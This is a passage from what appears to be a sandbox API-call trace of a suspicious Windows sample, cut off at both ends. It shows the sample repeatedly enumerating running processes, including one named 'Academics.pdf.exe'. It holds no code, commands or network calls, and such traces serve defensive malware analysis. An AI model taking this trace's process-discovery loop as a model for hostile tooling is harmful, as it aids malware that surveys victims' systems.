szExeFile="taskeng.exe")) returned 1 [0285.529] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0285.530] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0285.531] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0285.532] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0285.533] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0285.533] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0285.534] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0285.535] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0285.536] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0285.537] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0285.537] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0285.538] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0285.539] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0285.540] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0285.541] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0285.541] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0285.542] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0285.543] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0285.544] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0285.545] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.546] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0285.547] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.548] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0285.549] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0285.549] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0285.550] CloseHandle (hObject=0x294) returned 1 [0285.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0285.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0285.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0285.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0285.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0285.551] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0285.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0285.551] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0285.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0285.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0285.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0285.551] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0285.553] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.554] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0285.555] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0285.556] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0285.557] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0285.558] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0285.559] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0285.559] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0285.560] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0285.561] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0285.562] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.563] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.564] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.564] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.565] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.566] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0285.567] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.568] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.569] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0285.569] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0285.570] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0285.571] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0285.572] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.573] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0285.573] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0285.574] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0285.575] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0285.576] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0285.577] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0285.578] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0285.579] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0285.579] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0285.580] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0285.581] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0285.582] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0285.583] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0285.600] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0285.601] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0285.602] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0285.604] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0285.605] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0285.607] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0285.608] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0285.609] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.611] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0285.612] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.613] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0285.615] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0285.616] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0285.617] CloseHandle (hObject=0x294) returned 1 [0285.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0285.617] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0285.617] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0285.617] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0285.619] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.620] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0285.621] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0285.622] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: 